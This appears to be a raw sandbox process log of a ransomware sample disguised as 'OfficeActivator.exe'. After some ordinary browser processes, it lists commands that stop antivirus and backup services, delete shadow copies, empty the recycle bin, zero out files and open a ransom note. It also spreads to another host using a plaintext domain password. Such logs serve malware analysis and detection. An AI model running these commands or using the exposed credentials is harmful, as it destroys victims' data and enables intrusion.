C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x3cc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6548 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe
"C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe" \10.127.1.41 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.127.1.41 /USER:SHJPOLICE\amer !Omar2012
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\Desktop\OfficeActivator.exe
"C:\Users\Admin\Desktop\OfficeActivator.exe"
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
